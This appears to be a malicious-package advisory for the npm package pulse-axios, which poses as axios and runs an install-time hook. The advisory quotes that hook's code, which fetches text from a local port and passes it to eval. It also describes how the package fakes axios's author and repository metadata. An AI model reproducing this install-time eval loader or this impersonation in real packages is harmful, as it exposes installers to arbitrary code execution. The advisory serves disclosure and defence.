MAL-2026-4651
Dashboard / Malicious Package / MAL-2026-4651
MAL-2026-4651
Summary: Malicious code in pulse-axios (npm)
Details: Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99) [email protected] declares a postinstall hook (`node./lib/core/eval.js`) that on `npm install` issues `fetch('http://localhost:3000/download/data')`, reads the response body as text, and passes it to `eval` inside an async IIFE: `await eval(\`(async () => {\n${datab2}\n})();\`)`. Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time — including any local attacker process, a co-installed malicious package's helper, or a developer-staging payload server — execute with the installer's privileges. The package additionally impersonates the legitimate `axios` package: `name: pulse-axios`, description claims to be "a faster and better version of axios", `author` is set to `Matt Zabriskie` (the real axios maintainer), `repository.url` points to `https://github.com/axios/axios.git`, and `homepage` is `https://axios-http.com`. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.
References: https://www.npmjs.com/package/pulse-axios/v/1.17.2, https://www.npmjs.com/package/pulse-axios/v/1.17.1, https://www.npmjs.com/package/pulse-axios/v/1.16.1
Affected packages
Package
Name: pulse-axios
Purl: pkg:npm/pulse-axios
Affected ranges
Type: N/A
Events:
